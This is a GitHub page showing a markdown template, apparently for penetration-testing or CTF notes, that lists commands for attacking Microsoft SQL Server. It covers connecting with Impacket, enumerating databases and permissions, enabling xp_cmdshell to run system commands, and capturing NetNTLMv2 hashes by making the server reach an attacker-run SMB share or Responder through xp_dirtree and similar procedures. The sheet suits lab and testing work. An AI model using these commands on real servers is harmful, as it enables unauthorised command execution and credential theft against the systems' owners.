Skip to content

Latest commit

 

History

History
95 lines (73 loc) · 1.52 KB

MSSQL.md

File metadata and controls

95 lines (73 loc) · 1.52 KB
Raw

MSSQL - <% tp.frontmatter.current_port %>

Using some Impacket tools

Connecting

(If using kali try impacket-mssqlclient)

mssqlclient.py <user>@<% tp.frontmatter.target_ip %> -windows-auth

Database enumeration

After being connected

select name from sys.databases 
EXEC sp_databases
SELECT * FROM fn_my_permissions(NULL, 'SERVER');
SELECT name FROM master.sys.databases

Switch DBs

use <db>
SELECT name FROM sysobjects WHERE xtype = 'U'

Show all tables of DB

SELECT * FROM <db_NAME>.INFORMATION_SCHEMA.TABLES WHERE TABLE_TYPE = 'BASE TABLE'

Code execution

You don't always have permissions, but good to try

EXEC sp_configure 'show advanced options', '1'
RECONFIGURE
EXEC sp_configure 'xp_cmdshell', '1' 
RECONFIGURE

Example of code execution (If the above commands work)

xp_cmdshell "whoami"

Capturing NETNTLMV2 Hash

Capture hash

On your machine (If using kali try impacket-smbserver)

sudo smbserver.py share ./ -smb2support
sudo responder -I tun0

Send the Hash

A couple different ways to send a hash (These are done within MSSQL)

xp_dirtree '\\<% tp.frontmatter.my_ip %>\pwn'
exec master.dbo.xp_dirtree '\\<% tp.frontmatter.my_ip %>\pwn'
EXEC master..xp_subdirs '\\<% tp.frontmatter.my_ip %>\pwn'
EXEC master..xp_fileexist '\\<% tp.frontmatter.my_ip %>\pwn'